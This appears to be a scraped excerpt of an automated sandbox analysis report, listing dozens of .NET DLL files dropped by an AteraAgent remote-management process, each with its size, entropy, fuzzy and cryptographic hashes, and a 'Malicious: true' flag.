                                                                                                                                                                                                                                                                                              SHA-512:8A3B551E5D14A05A4DA4D244FA8BF285C5FBEC7B5D613EC5B8AB73F4EF90D7F6AC4DFBF1AF206D8C4FACFA115AA03531660C8E39535315F3B680F72F7D34DCB9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853696719137859
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:cSUP9W70WxhNyb8E9VF6IYijSJIVxu17pF:5Ue/lEpYi600FF
                                                                                                                                                                                                                                                                                              MD5:18E7320ADED59C532DD1093BB36A47E3
                                                                                                                                                                                                                                                                                              SHA1:321C5DEEBE109D276BC9BA37FC0427AF1BEAE560
                                                                                                                                                                                                                                                                                              SHA-256:83415D3468C938305AAA415D4CFAB000A256942414F04C461416E2C160BCDB6A
                                                                                                                                                                                                                                                                                              SHA-512:18519422D60ECA9255CDD896010A2698C6055FB19F82E26CE678D08A5A00B2CA86B0438B8EF175825B7B27948A41C28D6157AEBE366341EC13ED6B8569589866
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.847671491882663
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.817049710176357
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):142376
Entropy (8bit):6.160416111190502
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):192552
Entropy (8bit):6.1145313432038435
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):15400
Entropy (8bit):6.8352214136086555
Encrypted:false
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):16424
Entropy (8bit):6.792745535380218
Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:n1W1WMQWkMNyb8E9VF6IYijSJIVxuHjg4:o1yMEpYi60un
                                                                                                                                                                                                                                                                                              MD5:4B018741B464AED29724E31FE593A2F0
                                                                                                                                                                                                                                                                                              SHA1:435143DFD60DA9C7A3839B0AF6C0EEC9E6D72531
                                                                                                                                                                                                                                                                                              SHA-256:27A83893C71285085B9334678212FEFCE779CD3E877F8232B90FF61A2AD2E8E1
                                                                                                                                                                                                                                                                                              SHA-512:C542ECF9A11CECBA69FEFA791C7DCD18E6D0436E6D9F0C164FF50A4D2564A317890EC23C2B588AD6B8441551B6BF046D2D714CF484D71978DBDA75034861BDF2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.832665685039471
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:JQ/rx72WSKW5TPZNyby2sE9jBF6IYiYF85S35IVnxGUHFA/P6iMYRh9:6dSWSKW1BNyb8E9VF6IYijSJIVxsbMq/
                                                                                                                                                                                                                                                                                              MD5:51835E547CFCAEDCD46D41A916007337
                                                                                                                                                                                                                                                                                              SHA1:027AF2DA308C20BFECFE01D6925F15677658B9ED
                                                                                                                                                                                                                                                                                              SHA-256:E0D868F38EA149A2256491A2067E7C1EB21A9CBE68FD018A7EAA2D65E8C6F5B4
                                                                                                                                                                                                                                                                                              SHA-512:6FA395D0B6B230B96A0263BA005A5E6518CA96E6785BBC964D75108CD9C3E58670B9CEEA2BC11188F1FD4CDA1C2A03A63F3E9C12A84AAB233BDEDBE0EF8149F0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7476634745054485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:XJEYA2WkIWcqNyb8E9VF6IYijSJIVx1IZ22zG:XyYA8CqEpYi60+Zu
                                                                                                                                                                                                                                                                                              MD5:2B512D2A20AA68D1F8AA686BF246F15B
                                                                                                                                                                                                                                                                                              SHA1:D37F581A2DD9651E3A9F0D2B00D1275FE43F81EB
                                                                                                                                                                                                                                                                                              SHA-256:D9B9A099BCB2D685BF4CAF9A04FA022D08AABE3CBBD04912FB9FFF73CCD162F6
                                                                                                                                                                                                                                                                                              SHA-512:4C999BD5F20691AB4AB77015E34F0822076FB549A4B41495496AD8505FE6BC3A732DC1AAFDDC5FB6E576AA76AAD673D674A21C421D1FBB8791EB3D2CC4CFCD23
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8755777127592
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:hJGWe4WTYNyb8E9VF6IYijSJIVx5O3zCp:fmRQEpYi60tp
                                                                                                                                                                                                                                                                                              MD5:671D536227E78B50106A0D293D9EF1AC
                                                                                                                                                                                                                                                                                              SHA1:2B269A49DB0EBC5120EECB135AD96C78DDE1FEF9
                                                                                                                                                                                                                                                                                              SHA-256:6C679EC299B4A95EDB26E8AB547BF78E351FBD75CFFAF40FB3E65F036DBF99B9
                                                                                                                                                                                                                                                                                              SHA-512:5B2B63DB5E757B8ECB742F020DC62F0E239628DDC8A6874AB0E22D6F746F8BD4268E8544B39D7443E8FBD9456A341FD8BE8B333CCE0CF9819E6083CF533EB05A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785938093349042
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:IdW1w3WesWn3Nyb8E9VF6IYijSJIVxV4NN:R1wxd7EpYi60+j
                                                                                                                                                                                                                                                                                              MD5:6945923300972B5EA47E0598706612C2
                                                                                                                                                                                                                                                                                              SHA1:E5F2A7CF773248575B60E0C53012E028B674E19A
                                                                                                                                                                                                                                                                                              SHA-256:BCC856A3826E500F74A5F6A6C26868D99049E41A8347C70090415FA2193A045C
                                                                                                                                                                                                                                                                                              SHA-512:3505A8D5F660BA87380F6F7CE200CA5A26434502A1784BF4ADF6DC2D7AFD9DBF06C3E76B4BBBFFF2E96D27AB50D4483CD629348738FA51E6B8B6FE509AD08BB1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24616
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.595041169888453
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:0ylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsW1gNyb8E9VFh:0yp12Bhkg3qnV/srYEpYi60Rt
                                                                                                                                                                                                                                                                                              MD5:FE7190348625EC55451232FC2D3FB595
                                                                                                                                                                                                                                                                                              SHA1:D141B545D0F3D521DC980631858F1E4EDA517A5A
                                                                                                                                                                                                                                                                                              SHA-256:89179D883E20AE9C91F902F7A97D2086D2F73AE4658C4AF10B98F88DDFB59664
                                                                                                                                                                                                                                                                                              SHA-512:C9507147B018DC03D02A4F6E6706150F4ABAE1208163AFE6B24B36FB8618CAA21474661C424CFA0AA91B76573B4B73D2530014DC4EB67580D8F8FB495D9A2F66
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853316216137834
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:4HPAW1bWieNyb8E9VF6IYijSJIVxJ5RqR:8rTmEpYi604R
                                                                                                                                                                                                                                                                                              MD5:376862D3F297321F423A4F28169DE6DB
                                                                                                                                                                                                                                                                                              SHA1:4176FCCBFE1121ED76B86DE9FECC8C4FEEEFF827
                                                                                                                                                                                                                                                                                              SHA-256:2E5DC554D21C726495799BD068C3FD882854FA533ECF7D366DE2B055B0C703B0
                                                                                                                                                                                                                                                                                              SHA-512:E9185A15A4544659E22459084A7473884328F1C09BC087348768819FAD39A403F5C9948A571813F096D27FD2984CCBC7EE065E7A1F1FBDB02A7DD0DB9ADA6CF9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853448956403336
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:J+TxwFqWD7W5/PtNyby2sE9jBF6IYiYF85S35IVnxGUHFCetddDAx:wNoqWD7WJlNyb8E9VF6IYijSJIVxeQ0x
                                                                                                                                                                                                                                                                                              MD5:C4688280A8EB58E5AC6CDD201B202B06
                                                                                                                                                                                                                                                                                              SHA1:F4A67D8693A1AFBC16BB40C21ED6BC3700EFE786
                                                                                                                                                                                                                                                                                              SHA-256:C34591E43D225239F8804BC4E780B9C98FAA60FAC54AF18CF016AB1C952EBB5D
                                                                                                                                                                                                                                                                                              SHA-512:E0BDBF8B6853D6539F5545819E07CE947BE860D8753C27EB8E9647649CEFC0ADD2A2FE1304FDF9BDE712D873162EA7556162A6F6438EB2CD582F9DADA949418E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.864638231153108
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:FGETSAWUEWSWNyb8E9VF6IYijSJIVx6t0y/t:pT18+EpYi60O/t
                                                                                                                                                                                                                                                                                              MD5:975F2775F87D6C08679BC41F033BF2AE
                                                                                                                                                                                                                                                                                              SHA1:9B8441CB1201AB46C5E8CDC24D5370C0AA12F886
                                                                                                                                                                                                                                                                                              SHA-256:8BA82BCD2E912A9E36E18F75390E18F4E6EA6FFEB170A4BD85028F20035D219F
                                                                                                                                                                                                                                                                                              SHA-512:AB9A85D45D593FA7BF1F59196241B7BAB1CB81F0D17E3D72BC5C59BCE9E1D8D98EFE783A5981148D90F9260D9D70E0767DED7C3B8AD2599BDC4B890258B7DBBF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):110120
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5108128247654085
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:XPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76t:XWw0SUUKBM8aOUiiGw7qa9tK/Ybi
                                                                                                                                                                                                                                                                                              MD5:7CB47D2C6D6A41F40B81FC86A91AE937
                                                                                                                                                                                                                                                                                              SHA1:A82BCC7EE4A91A1D13C30FCC6A8FC91CCED08E29
                                                                                                                                                                                                                                                                                              SHA-256:1F18D0E36EB23A81A4C399240F7DA7CC2A9823338920E677DD674417A4114D16
                                                                                                                                                                                                                                                                                              SHA-512:8C36F363195CDB1F30A4FE3392045D18F884A9E91C8EBE2D78D6C5AAE6461D4EE28044D64C18C3EAC79B8C92C76E22446DFD26A73F07F329B65C1F4B9D751081
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.848632194828129
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:acDagtDApWSKJWFrNyb8E9VF6IYijSJIVx4LsnrdU:aPKBKnEpYi60NrdU
                                                                                                                                                                                                                                                                                              MD5:459770A3E8621ABB77D33F2CF1CBEDD6
                                                                                                                                                                                                                                                                                              SHA1:D785E240353419EFF2DC457A696BC44C5A1AC1D3
                                                                                                                                                                                                                                                                                              SHA-256:248F54212A62DFBCCA1F65E68902F7AFCBE474CCA2E87394646AAA6976DD0C08
                                                                                                                                                                                                                                                                                              SHA-512:0EE526A89B7620E0EC6B98F0F21EC5DAA33A6F468131340E89EAF9486C699FA8EEC6FDEAA7F403FC80C836128A99E8BC2D4483E07D7D0D17F9B8C7B9F5FC3586
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.857847377763634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:fIWD4WmiNyb8E9VF6IYijSJIVxM0r86kT:f1oiEpYi60rkT
                                                                                                                                                                                                                                                                                              MD5:1F8B2D1E1E3A515E4117B5B240EA998F
                                                                                                                                                                                                                                                                                              SHA1:ED2B96B4309561D3C5289A0C4990EA8B6A669259
                                                                                                                                                                                                                                                                                              SHA-256:6018F6A293FDC80EDADA971BDD4E2D2439916AEBFE6D1104C83DBF49FFC7C9CF
                                                                                                                                                                                                                                                                                              SHA-512:941D3172CFDB57667D0D730B9D12110E12852DE940C4A6BA0DA7E70C58CB289F8D08EE370E386D29370FEF95BFD5D35EC4E328B8AC46C67EDAFB98B9997F50B6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 15912
Entropy (8bit): 6.785369657459982
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 16424
Entropy (8bit): 6.724157119947449
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 15400
Entropy (8bit): 6.829404767120568
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 15400
Entropy (8bit): 6.886594331713788
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 15400
Entropy (8bit): 6.832440945277622
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 17960
Entropy (8bit): 6.67540834837691
Encrypted: false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.81362702616023
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1na8WK1WLfNyb8E9VF6IYijSJIVxY4YvO/:1na0ojEpYi60SO/
                                                                                                                                                                                                                                                                                              MD5:1B83C23AD63079909D9249AF270CE723
                                                                                                                                                                                                                                                                                              SHA1:9B69A0EE1F1CB7D51B949F4FC4564309C2B69F6E
                                                                                                                                                                                                                                                                                              SHA-256:DCB0FD8AC602600500A66FF63C3EED2004AF2815AFEF44C17ED7FD56C7A64865
                                                                                                                                                                                                                                                                                              SHA-512:ED020CE93C9F8AFF9B482ABBC39D19FE33E9F1527729262CBA65C8BB7EBAB1FF3936D2970DACD3ECFAA3D70DFBBF01F4CFCF372D215FEF564CB058AC4C0EC9F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.763739326554534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/BSWITWWSNyb8E9VF6IYijSJIVx3mR6pE:/6LyEpYi60WR9
                                                                                                                                                                                                                                                                                              MD5:8701AC62E4798E316D261B8B610ABCED
                                                                                                                                                                                                                                                                                              SHA1:AEFC7E582FD623838E37117D3E1E4AF7A774F205
                                                                                                                                                                                                                                                                                              SHA-256:C6EE477A087AF68BCA366F0F1EB844AF1C1453E710DD5B63BBFFE0365DF59100
                                                                                                                                                                                                                                                                                              SHA-512:EAD5EEC7465E84D8335713AC824F1D99BC0DF721EBA845E0625933A8915CD24AED788FE3C4D17A03BBAAEAC790E5AF4D4B3D69E6202A791ADE2D87B5FD171632
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8758049902132425
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:R88cIIWNoWJiNyb8E9VF6IYijSJIVxJQqeNHPw:R9cU7iEpYi60VeNHo
                                                                                                                                                                                                                                                                                              MD5:673FC0EDF04D3C42EC568DA9B17C41FE
                                                                                                                                                                                                                                                                                              SHA1:E5E4BC30C22AD35A68A30EEBA3E99EA4BCF5CB3C
                                                                                                                                                                                                                                                                                              SHA-256:4AA394D3C7347439434D4839E8CEB3BEB2731D05DEF428FACDF3911BD701556F
                                                                                                                                                                                                                                                                                              SHA-512:EFA56562181FC801B21D4B33B0079020B6BA6D45194C9D5932F9856122CA6F8490D6D5CE48046BF3E48162125FF1998527B123189A11B2190A3FCEA00BD5398E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22568
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.621496009544969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8kUwx9rm5go1fWKmmW4oqN5dWjaWbJNyb8E9VF6IYijSJIVxowXqgrVJ:rrmoFmWXX/NEpYi60b5
                                                                                                                                                                                                                                                                                              MD5:C8A35AFE897C901B54B621BE5527A672
                                                                                                                                                                                                                                                                                              SHA1:A63AC12893B791995A14818C806EE0F59570B267
                                                                                                                                                                                                                                                                                              SHA-256:329BC85D116D0E0C4AC79596A0128BA2504C6CC9AE519D649F5D0DC8BBE12DE3
                                                                                                                                                                                                                                                                                              SHA-512:72313DB7BE5CA2F90A38277AD5339AB3E9577763FE0721D90FA3D186A45E895F4C3B131A7244401E1E80F4A80C136F7EF30AB7D0BA224743BF874CD67AC3EA06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.672732671770867
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:E09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVsc:lOAghbsDCyVnVc3p/i2fBVlAO/BRU+pu
                                                                                                                                                                                                                                                                                              MD5:312173D3BC4ED8D4C7F8767D11B1C6E6
                                                                                                                                                                                                                                                                                              SHA1:F145617D35C86FD11D4AC4D0AFAD5517A4989451
                                                                                                                                                                                                                                                                                              SHA-256:2919C102D0AB36CD0704AFD5EF642432EF297BC9EBB964FDCC171BF5B0CB7603
                                                                                                                                                                                                                                                                                              SHA-512:727302C6AF63D4FFC3810FF51863B244666DA14517474F175FD39E6CCE4907D13A7A88A95032753DA36508FFD88E25C11236BC22153107D39B2EE6EEA4DC050C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.826444460589489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.9210346623513805
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.890331489145955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):21032
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.541043818179056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18984
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.683466650805465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23592
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.318460763867933
